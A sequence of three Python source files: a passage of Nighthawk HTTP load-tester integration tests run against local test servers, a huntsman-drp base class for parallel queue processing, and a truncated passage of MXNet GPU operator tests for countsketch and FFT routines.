test_https_prefetching(https_test_server_fixture): """Test we prefetch connections. We test for 1 second at 1 rps, which should result in 1 connection max without prefetching. However, we specify 50 connections and the prefetching flag, so we ought to see 50 http1 connections created. """ parsed_json, _ = https_test_server_fixture.runNighthawkClient([ "--duration 1", "--rps 1", "--prefetch-connections", "--connections 50", https_test_server_fixture.getTestServerRootUri() ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 50) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_log_verbosity(https_test_server_fixture): """Test that the specified log verbosity level is respected. This tests for a sentinel we know is only right when the level is set to 'trace'. """ # TODO(oschaaf): this is kind of fragile. Can we improve? trace_level_sentinel = "nighthawk_service_zone" _, logs = https_test_server_fixture.runNighthawkClient( ["--duration 1", "--rps 1", "-v debug", https_test_server_fixture.getTestServerRootUri()]) asserts.assertNotIn(trace_level_sentinel, logs) _, logs = https_test_server_fixture.runNighthawkClient( ["--duration 1", "--rps 1", "-v trace", https_test_server_fixture.getTestServerRootUri()]) asserts.assertIn(trace_level_sentinel, logs) def test_dotted_output_format(http_test_server_fixture): """Test that we get the dotted string output format when requested, and ensure we get latency percentiles.""" output, _ = http_test_server_fixture.runNighthawkClient([ "--duration 1", "--rps 10", "--output-format dotted", http_test_server_fixture.getTestServerRootUri() ], as_json=False) asserts.assertIn("global.benchmark_http_client.request_to_response.permilles-500.microseconds", output) # TODO(oschaaf): add percentiles to the gold testing in the C++ output formatter # once the fortio formatter has landed (https://github.com/envoyproxy/nighthawk/pull/168) def test_cli_output_format(http_test_server_fixture): """Test that we observe latency percentiles with CLI output.""" output, _ = http_test_server_fixture.runNighthawkClient( ["--duration 1", "--rps 10", http_test_server_fixture.getTestServerRootUri()], as_json=False) asserts.assertIn("Initiation to completion", output) asserts.assertIn("Percentile", output) @pytest.mark.parametrize( 'filter_configs', ["{}", "{static_delay: \"0.01s\"}", "{emit_previous_request_delta_in_response_header: \"aa\"}"]) def test_request_body_gets_transmitted(http_test_server_fixture, filter_configs): """Test request body transmission handling code for our extensions. Ensure that the number of bytes we request for the request body gets reflected in the upstream connection transmitted bytes counter for h1 and h2. """ def check_upload_expectations(fixture, parsed_json, expected_transmitted_bytes, expected_received_bytes): counters = fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", expected_transmitted_bytes) server_stats = fixture.getTestServerStatisticsJson() # Server side expectations start failing with larger upload sizes asserts.assertGreaterEqual( fixture.getServerStatFromJson(server_stats, "http.ingress_http.downstream_cx_rx_bytes_total"), expected_received_bytes) # TODO(#531): The dynamic-delay extension hangs unless we lower the request entity body size. upload_bytes = 1024 * 1024 if "static_delay" in filter_configs else 1024 * 1024 * 3 requests = 10 args = [ http_test_server_fixture.getTestServerRootUri(), "--duration", "100", "--rps", "100", "--request-body-size", str(upload_bytes), "--termination-predicate", "benchmark.http_2xx:%s" % str(requests), "--connections", "1", "--request-method", "POST", "--max-active-requests", "1", "--request-header", "x-nighthawk-test-server-config:%s" % filter_configs ] # Test we transmit the expected amount of bytes with H1 parsed_json, _ = http_test_server_fixture.runNighthawkClient(args) check_upload_expectations(http_test_server_fixture, parsed_json, upload_bytes * requests, upload_bytes * requests) # Test we transmit the expected amount of bytes with H2 args.append("--h2") parsed_json, _ = http_test_server_fixture.runNighthawkClient(args) # We didn't reset the server in between, so our expectation for received bytes on the server side is raised. check_upload_expectations(http_test_server_fixture, parsed_json, upload_bytes * requests, upload_bytes * requests * 2) def test_http_h1_termination_predicate(http_test_server_fixture): """Test with a termination predicate. Should result in successfull execution, with 10 successfull requests. We would expect 25 based on rps and duration. """ parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--duration", "5", "--rps", "500", "--connections", "1", "--termination-predicate", "benchmark.http_2xx:9" ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 10) def test_http_h1_failure_predicate(http_test_server_fixture): """Test with a failure predicate. Should result in failing execution, with 10 successfull requests. """ parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--duration", "5", "--rps", "500", "--connections", "1", "--failure-predicate", "benchmark.http_2xx:0" ], expect_failure=True) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 1) def test_bad_arg_error_messages(http_test_server_fixture): """Test arguments that pass proto validation, but are found to be no good nonetheless, result in reasonable error messages.""" _, err = http_test_server_fixture.runNighthawkClient( [http_test_server_fixture.getTestServerRootUri(), "--termination-predicate ", "a:a"], expect_failure=True, as_json=False) assert "Bad argument: Termination predicate 'a:a' has an out of range threshold." in err def test_multiple_backends_http_h1(multi_http_test_server_fixture): """Test that we can load-test multiple backends on http. Runs the CLI configured to use plain HTTP/1 against multiple test servers, and sanity checks statistics from both client and server. """ nighthawk_client_args = [ "--multi-target-path", "/", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ] for uri in multi_http_test_server_fixture.getAllTestServerRootUris(): nighthawk_client_args.append("--multi-target-endpoint") nighthawk_client_args.append(uri.replace("http://", "").replace("/", "")) parsed_json, stderr = multi_http_test_server_fixture.runNighthawkClient(nighthawk_client_args) counters = multi_http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_rx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_cx_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_tx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 3) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 3) for parsed_server_json in multi_http_test_server_fixture.getAllTestServerStatisticsJsons(): single_2xx = multi_http_test_server_fixture.getServerStatFromJson( parsed_server_json, "http.ingress_http.downstream_rq_2xx") # Confirm that each backend receives some traffic asserts.assertGreaterEqual(single_2xx, 1) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_multiple_backends_https_h1(multi_https_test_server_fixture): """Test that we can load-test multiple backends on https. Runs the CLI configured to use HTTP/1 with TLS against multiple test servers, and sanity checks statistics from both client and server. """ nighthawk_client_args = [ "--multi-target-use-https", "--multi-target-path", "/", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ] for uri in multi_https_test_server_fixture.getAllTestServerRootUris(): nighthawk_client_args.append("--multi-target-endpoint") nighthawk_client_args.append(uri.replace("https://", "").replace("/", "")) parsed_json, stderr = multi_https_test_server_fixture.runNighthawkClient(nighthawk_client_args) counters = multi_https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_rx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_cx_total", 3) asserts.assertCounterGreater(counters, "upstream_cx_tx_bytes_total", 0) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 3) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 3) total_2xx = 0 for parsed_server_json in multi_https_test_server_fixture.getAllTestServerStatisticsJsons(): single_2xx = multi_https_test_server_fixture.getServerStatFromJson( parsed_server_json, "http.ingress_http.downstream_rq_2xx") asserts.assertBetweenInclusive(single_2xx, 8, 9) total_2xx += single_2xx asserts.assertBetweenInclusive(total_2xx, 24, 25) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/sni_origin.yaml"]) def test_https_h1_sni(https_test_server_fixture): """Test that SNI indication works on https/h1.""" # Verify success when we set the right host parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:2", "--request-header", "host: sni.com" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_http1_total", 1) asserts.assertCounterGreaterEqual(counters, "ssl.handshake", 1) # Verify failure when we set no host (will get plain http) parsed_json, _ = https_test_server_fixture.runNighthawkClient( [https_test_server_fixture.getTestServerRootUri(), "--rps", "20", "--duration", "100"], expect_failure=True) # Verify success when we use plain http and don't request the sni host parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri().replace("https://", "http://"), "--rps", "100", "--duration", "20", "--termination-predicate", "benchmark.http_2xx:2" ], expect_failure=False) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_http1_total", 1) asserts.assertNotIn("ssl.handshake", counters) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/sni_origin.yaml"]) def test_https_h2_sni(https_test_server_fixture): """Tests that SNI indication works on https/h1.""" # Verify success when we set the right host parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:2", "--request-header", ":authority: sni.com", "--h2" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_http2_total", 1) asserts.assertCounterEqual(counters, "ssl.handshake", 1) # Verify success when we set the right host parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:2", "--request-header", "host: sni.com", "--h2" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_http2_total", 1) asserts.assertCounterEqual(counters, "ssl.handshake", 1) # Verify failure when we set no host (will get plain http) parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--h2" ], expect_failure=True) # Verify failure when we provide both host and :authority: (will get plain http) parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--h2", "--request-header", "host: sni.com", "--request-header", ":authority: sni.com" ], expect_failure=True) @pytest.fixture(scope="function", params=[1, 25]) def qps_parameterization_fixture(request): """Yield queries per second values to iterate test parameterization on.""" param = request.param yield param @pytest.fixture(scope="function", params=[5, 10]) def duration_parameterization_fixture(request): """Yield duration values to iterate test parameterization on.""" param = request.param yield param @pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable in sanitizer runs") def test_http_request_release_timing(http_test_server_fixture, qps_parameterization_fixture, duration_parameterization_fixture): """Test latency-sample-, query- and reply- counts in various configurations.""" for concurrency in [1, 2]: parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--duration", str(duration_parameterization_fixture), "--rps", str(qps_parameterization_fixture), "--concurrency", str(concurrency) ]) global_histograms = http_test_server_fixture.getNighthawkGlobalHistogramsbyIdFromJson( parsed_json) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) global_result = http_test_server_fixture.getGlobalResults(parsed_json) actual_duration = utility.get_execution_duration_from_global_result_json(global_result) # Ensure Nighthawk managed to execute for at least some time. assert actual_duration >= 1 # The actual duration is a float, flooring if here allows us to use # the GreaterEqual matchers below. total_requests = qps_parameterization_fixture * concurrency * math.floor(actual_duration) asserts.assertGreaterEqual( int(global_histograms["benchmark_http_client.request_to_response"]["count"]), total_requests) asserts.assertGreaterEqual( int(global_histograms["benchmark_http_client.queue_to_connect"]["count"]), total_requests) asserts.assertGreaterEqual(int(global_histograms["benchmark_http_client.latency_2xx"]["count"]), total_requests) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", (total_requests)) # Give system resources some time to recover after the last execution. time.sleep(2) def _send_sigterm(process): # Sleep for a while, under tsan the client needs a lot of time # to start up. 10 seconds has been determined to work through # emperical observation. time.sleep(10) process.terminate() def test_cancellation_with_infinite_duration(http_test_server_fixture): """Test that we can use signals to cancel execution.""" args = [ http_test_server_fixture.nighthawk_client_path, "--concurrency", "2", http_test_server_fixture.getTestServerRootUri(), "--no-duration", "--output-format", "json" ] client_process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) Thread(target=(lambda: _send_sigterm(client_process))).start() stdout, stderr = client_process.communicate() client_process.wait() output = stdout.decode('utf-8') asserts.assertEqual(client_process.returncode, 0) parsed_json = json.loads(output) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "graceful_stop_requested", 2) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 1) @pytest.mark.parametrize('server_config', [ "nighthawk/test/integration/configurations/nighthawk_http_origin.yaml", "nighthawk/test/integration/configurations/nighthawk_track_timings.yaml" ]) def test_http_h1_response_header_latency_tracking(http_test_server_fixture, server_config): """Test emission and tracking of response header latencies. Run the CLI configured to track latencies delivered by response header from the test-server. Ensure that the origin_latency_statistic histogram receives the correct number of inputs. """ parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--connections", "1", "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--latency-response-header-name", "x-origin-request-receipt-delta" ]) global_histograms = http_test_server_fixture.getNighthawkGlobalHistogramsbyIdFromJson(parsed_json) asserts.assertEqual(int(global_histograms["benchmark_http_client.latency_2xx"]["count"]), 100) # Verify behavior is correct both with and without the timing filter enabled. expected_histogram_count = 99 if "nighthawk_track_timings.yaml" in server_config else 0 asserts.assertEqual( int(global_histograms["benchmark_http_client.origin_latency_statistic"]["count"]), expected_histogram_count) def _run_client_with_args(args): return utility.run_binary_with_args("nighthawk_client", args) def test_client_help(): """Test that passing --help behaves as expected.""" (exit_code, output) = _run_client_with_args("--help") asserts.assertEqual(exit_code, 0) asserts.assertIn("USAGE", output) def test_client_bad_arg(): """Test that passing bad arguments behaves as expected.""" (exit_code, output) = _run_client_with_args("127.0.0.1 --foo") asserts.assertEqual(exit_code, 1) asserts.assertIn("PARSE ERROR: Argument: --foo", output) def test_client_cli_bad_uri(http_test_server_fixture): """Test that passing a bad URI to the client results in nice behavior.""" _, err = http_test_server_fixture.runNighthawkClient(["http://http://foo"], expect_failure=True, as_json=False) assert "Invalid target URI" in err @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_drain(https_test_server_fixture): """Test that the pool drain timeout is effective, and we terminate in a timely fashion. Sets up the test server to delay replies 100 seconds. Our execution will only last 30 seconds, so we expect to observe no replies. Termination should be cut short by the drain timeout, which means that we should have results in approximately execution duration + drain timeout = 35 seconds. (the pool drain timeout is hard coded to 5 seconds as of writing this). If drain timeout is reached, a message will be logged to the user. """ parsed_json, logs = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "20", "--request-header", "x-nighthawk-test-server-config: {static_delay: \"100s\"}" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "upstream_cx_http1_total", 1) asserts.assertNotIn("benchmark.http_2xx", counters) asserts.assertIn("Wait for the connection pool drain timed out, proceeding to hard shutdown", logs)
base.py
""" Code to provide a base class for processing objects in a queue in parallel. Features: - Generic use case for processing objects in a queue. - Can run using either a process pool or thread pool. - Handles and logs uncaught exceptions. - Minimal CPU downtime. """ import gc import time import atexit import queue from functools import partial from threading import Thread from contextlib import suppress from multiprocessing import Pool, Event from multiprocessing import JoinableQueue as Queue from abc import ABC, abstractmethod from panoptes.utils.time import CountdownTimer from huntsman.drp.base import HuntsmanBase from huntsman.drp.collection import ExposureCollection, CalibCollection def _wrap_process_func(i, func): """ Get objects from the input queue and process them, putting results in output queue. Args: i (int): Dummy variable used to start the pool. func (Function): Function used to process the object. """ global exposure_collection global input_queue global output_queue global stop_event logger = exposure_collection.logger while True: # Check if we should break out of the loop if stop_event.is_set(): break # Get an object from the queue try: obj = input_queue.get(timeout=1) except queue.Empty: continue # Process the object success = True try: func(obj, calib_collection=calib_collection, exposure_collection=exposure_collection) except Exception as err: logger.error(f"Exception while processing {obj}: {err!r}") success = False # Apparently putting exceptions into the queue causes problems (hanging on get) # So return a boolean value to indicate success result = {"obj": obj, "success": success} # Put the result in the output queue output_queue.put(result) # Explicit garbage collection gc.collect() def _init_pool(function, config, in_queue, out_queue, stp_event): """ Initialise the process pool. This function is required because we need to share the queue objects with each process and they cannot be parsed directly. Additionally create Collection objects here so that they do not need to be recreated for each procesed object. Args: function (Function): The wrapped processing function. config (dict): The config. in_queue (Queue): The input queue. out_queue (Queue): The output queue. stp_queue (Queue): The queue used to send the stop messages. """ # Declare global objects global exposure_collection global calib_collection global input_queue global output_queue global stop_event # Assign global objects input_queue = in_queue output_queue = out_queue stop_event = stp_event exposure_collection = ExposureCollection(config=config) calib_collection = CalibCollection(config=config) class ProcessQueue(HuntsmanBase, ABC): """ Abstract class to process queued objects in parallel. """ _pool_class = Pool # Allow class overrides def __init__(self, exposure_collection=None, calib_collection=None, queue_interval=300, status_interval=30, nproc=None, directory=None, *args, **kwargs): """ Args: queue_interval (float): The amout of time to sleep in between checking for new files to process in seconds. Default 300s. status_interval (float, optional): Sleep for this long between status reports. Default 60s. directory (str): The top level directory to watch for new files, so they can be added to the relevant datatable. nproc (int): The number of processes to use. If None (default), will check the config item `screener.nproc` with a default value of 1. *args, **kwargs: Parsed to HuntsmanBase initialiser. """ super().__init__(*args, **kwargs) self.nproc = 1 if not nproc else int(nproc) # Setup the exposure collections if exposure_collection is None: exposure_collection = ExposureCollection(config=self.config, logger=self.logger) # Setup the collections self.exposure_collection = ExposureCollection(config=self.config, logger=self.logger) # Sleep intervals self._queue_interval = queue_interval self._status_interval = status_interval # Make queues self._input_queue = Queue() self._output_queue = Queue() # Setup threads self._status_thread = Thread(target=self._async_monitor_status) self._queue_thread = Thread(target=self._async_queue_objects) self._process_thread = Thread(target=self._async_process_objects) self._threads = [self._status_thread, self._queue_thread, self._process_thread] # Starting values self._n_processed = 0 self._n_failed = 0 self._total_queued = 0 self._stop_event = Event() self._queued_objs = set() # Set to keep track of what objects are in the queue atexit.register(self.stop) # This gets called when python is quit def __str__(self): return str(self.__class__.__name__) @property def is_running(self): """ Check if the screener is running. Returns: bool: True if running, else False. """ return all([t.is_alive() for t in self._threads]) @property def status(self): """ Return a status dictionary. NOTE: status call is not thread-safe, so minor inconsistencies are possible in the numbers. Returns: dict: The status dictionary. """ n_processed = self._n_processed n_input = self._input_queue.qsize() n_output = self._output_queue.qsize() total_queued = self._total_queued pending = total_queued - n_processed - n_input - n_output status = {"status_thread": self._status_thread.is_alive(), "queue_thread": self._queue_thread.is_alive(), "process_thread": self._process_thread.is_alive(), "processed": n_processed, "total_queued": total_queued, "pending": pending, "failed": self._n_failed, "input_queue": n_input, "output_queue": n_output} return status @property def threads_stopping(self): """ Return True if threads should stop, else False. """ return self._stop_event.is_set() @threads_stopping.setter def threads_stopping(self, value): """ Set to True if threads should stop, else False. """ if value: self._stop_event.set() else: self._stop_event.clear() def start(self): """ Start the service. """ self.logger.info(f"Starting {self}.") self.threads_stopping = False for thread in self._threads: thread.start() def stop(self, blocking=True): """ Stop the file ingestor. Args: blocking (bool, optional): If True (default), blocks until all threads have joined. """ self.logger.info(f"Stopping {self}.") self.threads_stopping = True if blocking: for thread in self._threads: with suppress(RuntimeError): thread.join() self.logger.info(f"{self} stopped.") @abstractmethod def _get_objs(self): """ Return a list of objects to process. Returned objects do not have to be unique and may already exist in the queue. This is an abstract method and must be overridden by subclasses. """ pass def _async_monitor_status(self): """ Report the status on a regular interval. """ self.logger.debug("Starting status thread.") while True: if self.threads_stopping: self.logger.debug("Stopping status thread.") break # Get the current status status = self.status self.logger.info(f"{self} status: {status}") if not self.is_running: self.logger.warning(f"{self} is not running.") # Sleep before reporting status again timer = CountdownTimer(duration=self._status_interval) while not timer.expired(): if self.threads_stopping: break time.sleep(1) self.logger.debug("Status thread stopped.") def _async_queue_objects(self): """ Add new objs to the queue. """ self.logger.debug("Starting queue thread.") while True: if self.threads_stopping: self.logger.debug("Stopping queue thread.") break objs_to_process = self._get_objs() # Update files to process self.logger.debug("Adding new objects to queue.") for obj in objs_to_process: if obj not in self._queued_objs: # Make sure queue objs are unique # Add the object to the set of objects currently being processed self._queued_objs.add(obj) # Queue the object for processing self._input_queue.put(obj) # Increment the total number of objects we have queued self._total_queued += 1 timer = CountdownTimer(duration=self._queue_interval) while not timer.expired(): if self.threads_stopping: break time.sleep(1) self.logger.debug("Queue thread stopped.") def _async_process_objects(self, process_func): """ Continually process objects in the queue. This method is indended to be overridden with all arguments provided by the subclass. Args: process_func (Function): Univariate function to parallelise. """ self.logger.debug(f"Starting processing with {self.nproc} processes.") wrapped_func = partial(_wrap_process_func, func=process_func) pool_init_args = (wrapped_func, self.config, self._input_queue, self._output_queue, self._stop_event) # Avoid Pool context manager to make multiprocessing coverage work pool = self._pool_class(self.nproc, initializer=_init_pool, initargs=pool_init_args) try: pool.map_async(wrapped_func, range(self.nproc)) while not (self.threads_stopping and self._output_queue.empty()): self._process_results() self.logger.debug("Terminating process pool.") finally: pool.close() pool.join() self.logger.debug("Process thread stopped.") def _process_results(self): """ Process the results in the output queue. """ try: result = self._output_queue.get(timeout=1) except queue.Empty: return obj = result["obj"] success = result["success"] if hasattr(self, "_on_failure"): try: self._on_failure(obj) except Exception as err: self.logger.error(f"Error in on_failure callback for {obj}: {err!r}") success_or_fail = "success" if success else "fail" self.logger.info(f"Finished processing {obj} ({success_or_fail}).") self._n_processed += 1 if not success: self._n_failed += 1 self._input_queue.task_done() self._output_queue.task_done() self._queued_objs.remove(obj)
test_operator_gpu.py
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from __future__ import print_function import sys import os import time import multiprocessing as mp import unittest import mxnet as mx import numpy as np import unittest from nose.tools import assert_raises from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal from mxnet.base import MXNetError from mxnet import autograd from numpy.testing import assert_allclose curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__))) sys.path.insert(0, os.path.join(curr_path, '../unittest')) from common import setup_module, with_seed, teardown, assert_raises_cudnn_disabled from test_operator import * from test_optimizer import * from test_random import * from test_exc_handling import * #from test_rnn import * from test_sparse_ndarray import * from test_sparse_operator import * from test_ndarray import * set_default_context(mx.gpu(0)) del test_support_vector_machine_l1_svm # noqa del test_support_vector_machine_l2_svm # noqa def check_countsketch(in_dim,out_dim,n): data = mx.sym.Variable("data") h = mx.sym.Variable("h") s = mx.sym.Variable("s") sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim) shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s arr = [mx.nd.empty(shape[i]) for i in range(3)] arr_grad = [mx.nd.empty(shape[i]) for i in range(3)] x = np.random.uniform(-10, 10, shape[0]) arr[0][:] = x #input x h = np.random.randint(0, out_dim, shape[1]) arr[1][:] = h #hash h s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2]) arr[2][:] = s #hash s locations = {"data": x, "h": h, "s": s} a = np.zeros((n,out_dim)) temp = np.multiply(x, s) for num_sample in np.arange(0,n): for idx in np.arange(0,in_dim): a[num_sample][h[0][idx]] += temp[num_sample][idx] check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0)) out_grad = mx.nd.empty((n,out_dim)) out_grad[:] = np.random.normal(-3, 3, (n,out_dim)) a = np.zeros((n,in_dim)) for j in np.arange(0,n): for i in np.arange(0,in_dim): a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i] check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0)) @with_seed() def test_countsketch(): minindim = 40 maxindim = 100 minoutdim = 5 maxoutdim = 30 maxn = 200 in_dim = np.random.randint(minindim, maxindim) out_dim = np.random.randint(minoutdim, maxoutdim) n = np.random.randint(1, maxn) check_countsketch(in_dim, out_dim, n) def check_ifft(shape): shape_old = shape if len(shape) == 2: if shape[1]%2 != 0: lst = list(shape) lst[1] = lst[1]*2 shape = tuple(lst) shape_old = shape shape = (shape[0],shape[1]*2) if len(shape) == 4: if shape[3]%2 != 0: lst = list(shape) lst[3] = lst[3]*2 shape = tuple(lst) shape_old = shape shape = (shape[0],shape[1],shape[2],shape[3]*2) sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128) init = [np.random.normal(size=shape, scale=1.0)] arr_grad = [mx.nd.empty(shape)] ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}] exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list] for exe in exe_list: for arr, iarr in zip(exe.arg_arrays, init): arr[:] = iarr.astype(arr.dtype) # forward for exe in exe_list: exe.forward(is_train= True) out1 = [exe.outputs[0].asnumpy() for exe in exe_list] if len(shape) == 2: init_complex = np.zeros(shape_old,dtype = np.complex64) for i in range(0,shape_old[1]): init_complex.real[:,i] = init[0][:,2*i] init_complex.imag[:,i] = init[0][:,2*i+1] a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-12) if len(shape) == 4: init_complex = np.zeros(shape_old,dtype = np.complex64) for i in range(0,shape_old[3]): init_complex.real[:,:,:,i] = init[0][:,:,:,2*i] init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1] a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None) assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-12) # backward if len(shape) == 2: out_grad = mx.nd.empty(shape_old) out_grad[:] = np.random.normal(-3, 3, shape_old) for exe in exe_list: exe.backward([out_grad]) temp = exe.grad_arrays[0].asnumpy() temp = np.zeros(shape_old) for i in range(shape_old[1]): temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i] a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None) assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12) if len(shape) == 4: out_grad = mx.nd.empty(shape_old) out_grad[:] = np.random.normal(-3, 3, shape_old) for exe in exe_list: exe.backward([out_grad]) temp = exe.grad_arrays[0].asnumpy() temp = np.zeros(shape_old) for i in range(shape_old[3]): temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i] a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None) assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-12) @with_seed(0) def test_ifft(): nrepeat = 2 maxdim = 10 for repeat in range(nrepeat): for order in [2,4]: shape = tuple(np.random.randint(1, maxdim, size=order)) check_ifft(shape) def check_fft(shape): sym = mx.sym.contrib.fft(name='fft', compute_size = 128) if len(shape) == 2: if shape[1]%2 != 0: lst = list(shape) lst[1] = lst[1]*2 shape = tuple(lst) shape_old = shape if len(shape) == 4: if shape[3]%2 != 0: lst = list(shape) lst[3] = lst[3]*2 shape = tuple(lst) shape_old = shape init = [np.random.normal(size=shape, scale=1.0)] arr_grad = [mx.nd.empty(shape)] ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}] exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list] for exe in exe_list: for arr, iarr in zip(exe.arg_arrays, init): arr[:] = iarr.astype(arr.dtype) #forward for exe in exe_list: exe.forward(is_train=True) out1 = [exe.outputs[0].asnumpy() for exe in exe_list] out = np.fft.fft(init, n=None, axis=-1, norm=None) if len(shape) == 2: out = np.reshape(out,(out.shape[1],out.shape[2])) out2 = np.append(out.real, out.imag, axis = 1) a = np.zeros(out1[0].shape) p = 0 for i in range(out2.shape[1]//2): a[:,p] = out2[:,i] a[:,p+1] = out2[:,i+out2.shape[1]//2] p = p+2 if len(shape) == 4: out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4])) out2 = np.append(out.real, out.imag, axis = 1) a = np.zeros(out1[0].shape) for i in range(out1[0].shape[0]): for j in range(out1[0].shape[1]): p = 0 for k in range(out2.shape[3]): a[i,j,:,p] = out2[i,j,:,k] a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k] p = p+2 assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-6) # backward if len(shape) == 2: out_grad = mx.nd.empty((shape[0],2*shape[1])) out_grad[:] = np.random.normal(-3, 3, 